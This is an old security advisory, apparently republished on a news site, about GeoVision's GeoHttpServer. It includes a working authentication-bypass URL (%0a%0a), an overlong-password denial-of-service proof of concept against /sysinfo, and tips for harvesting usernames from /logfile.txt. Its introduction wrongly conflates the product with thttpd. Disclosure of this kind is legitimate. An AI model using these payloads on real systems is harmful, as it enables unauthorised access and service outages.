Risks
Vulnerabilities
Browse by
GeoHttpServer Authentification Bypass Vulnerability & Denial Of Service Vulnerability
23 January 2004
Bookmark and Share
From: "Rafel Ivgi, The-Insider" <theinsider(at)012.net.il>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software: GeoHttpServer
Vendor: GEOVISION INC
http://www.geovision.com.tw
Versions: ALL
Platforms: Unix
Bug: Authentification Bypass Vulnerability & D.O.S (DenialOf Service)
Risk: High
Exploitation: Remote with browser
Date: 22 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

thttpd is a free "Open Source" webserver that comes by default with unixsystems such as FREEBSD and Linux.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The GeoHttpServer Security is pretty good. Some users, who understand whatthey are doing configure the server to authentificate login attempts.

The server uses this authentification code:
**********************************************
<html><head><title>Login In</title>
</head><body><center>
<form method="POST" action="phoneinfo">User Name:</BR>
<input type="id" name="id" size="10"><p></p>
Password:</BR>
<input type="password" name="pwd" size="10">
<p><input type="radio" name="ImageType" value="1" checked>JPEG&nbsp;
<input type="radio" name="ImageType" value="2">GIF</p>
<p><input type="submit" name="send" value="Submit"><input type="reset"
name="CANCEL" value="Cancel"></center><center>

</p>
</form>
</center>
</body>
</html>
**********************************************

Amazingly - http://<host>/%0a%0a Bypasses it!
You get the GeoHttpServer default Main Page.
Now the main page leads to functions that also require authentifiaction,In order to retrieve a user name we can go to http://<host>/logfile.txtWhich generally contains the last logins and usernames.
In most cases the password will be the same as the user.
In addition there is an authentification form inside the server thatrequires a name anda password in order to see the server info/config.
Manipulating this links can cause Denial Of service of the server.

P.O.C(Proof Of Concept):
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Another D.O.S caused by the server is an Internet Explorer D.O.S whensomeone is watchingvideo stream from the server and presses the reconnect button, I.E has anoverflow.
Internet Explorer Version: 6.0.2600.0
Module Stuck: msxml3.dll
Module Version: 8.20.9415.0
Offset: 00013ed6

http://theinsider.deep-ice.com/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authentification Bypass - http://<host>/%0a%0a Bypasses it!Denial Of Service -
http://<GeoHttpServerhost>/sysinfo?id=TheInsider&pwd=killedaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com


Spotlight

The security threat of unsanctioned file sharing

Posted on 31 October 2014.  |  Organisational leadership is failing to respond to the escalating risk of ungoverned file sharing practices among their employees, and employees routinely breach IT policies.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Fri, Oct 31st
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //